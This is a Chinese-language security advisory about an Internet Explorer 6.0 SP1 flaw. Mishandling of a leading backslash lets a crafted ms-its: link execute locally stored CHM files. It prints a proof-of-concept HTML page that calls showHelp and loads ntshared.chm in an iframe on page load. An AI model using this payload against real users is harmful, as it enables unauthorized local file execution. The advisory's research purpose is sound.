Microsoft Internet Explorer存在问题，远程攻击者可以利用这个漏洞未授权执行本地存储的CHM文件。

虽然之前的IE补丁已经修补了Showhelp执行CHM文件，但是由于协议处理器不正确处理"\"，当"\\"放置在目标CHM文件名之前时， 就会在HELP文件夹中搜索此名，如果HELP文件夹不包含此文件，就会转向ROOT目录中搜索，如果文件被搜索到就会被执行。不过此执行需要本地电脑域执行，攻击者需要利用其他漏洞绕过本地电脑安全域。

攻击者可以构建恶意链接，诱使用户处理。

受影响系统：
Microsoft Internet Explorer 6.0SP1

攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Roozbeh Afrasiabi （roozbeh_afrasiabi@yahoo.com）提供了如下测试方法：

<html>
<head>
<title>POC</title>
<p><br><b>HTM help file opened in an iframe</b><br><br>
<iframe id="target" width="700" height="400" src="ms-its:" name="target" scrolling="yes">
</iframe>
<!----SCRIPT LANGUAGE=javascript>
function getlink(){
showHelp("ms-its:\\ntshared.chm::/copyright.htm");
target.location="ms-its:\\ntshared.chm::/copyright.htm";
}
<!-----/script>
</head>
<body onload=getlink()>
</body>
</html>


解决方案：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：